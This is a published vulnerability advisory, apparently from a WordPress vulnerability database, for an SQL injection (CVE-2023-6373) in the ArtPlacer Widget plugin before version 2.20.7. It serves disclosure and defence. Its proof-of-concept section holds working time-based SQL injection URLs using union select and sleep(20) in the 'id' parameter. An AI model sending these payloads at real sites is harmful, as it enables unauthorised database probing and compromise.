ArtPlacer Widget < 2.20.7 – Editor+ SQLi | CVE 2023-6373 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape the "id" parameter before submitting the query, leading to a SQLI exploitable by editors and above. Note: Due to the lack of CSRF check, the issue could also be exploited via a CSRF against a logged editor (or above)

Proof of Concept

As an editor, open

https://example.com/wp-admin/admin.php?page=edit-art-placer&id=1+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%28sleep%2820%29%29

Other POC:
https://example.com/wp-admin/admin.php?page=edit-art-placer&id=(sleep(20))
https://example.com/wp-admin/admin.php?page=edit-art-placer&id=1 union select 1,1,1,1,1,1,1,1,(sleep(20))

Affects Plugins

artplacer-widget

Fixed in 2.20.7

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Original Researcher

Claudio Marchesini, Enrico Marcolini

Submitter

Claudio Marchesini, Enrico Marcolini

Submitter website

https://www.dottormarc.it

Verified

Yes

WPVDB ID

afc11c92-a7c5-4e55-8f34-f2235438bd1b

Timeline

Publicly Published

2023-12-07 (about 5 months ago)

Added

2023-12-07 (about 5 months ago)

Last Updated

2023-12-07 (about 5 months ago)

Other

Published

Title

Published

2024-02-16

Title

MasterStudy LMS WordPress Plugin – for Online Courses and Education < 3.2.6 - Unauthenticated SQL Injection

Published

2022-12-09

Title

Cryptocurrency Widgets Pack < 2.0 - Unauthenticated SQLi

Published

2023-01-18

Title

MainWP Broken Links Checker Extension <= 4.0 - Unauthenticated SQLi

Published

2023-01-13

Title

Custom 404 Pro < 3.7.1 - Admin+ SQLi

Published

2022-10-03

Title

Blog2Social < 6.9.10 - Subscriber+ SQLi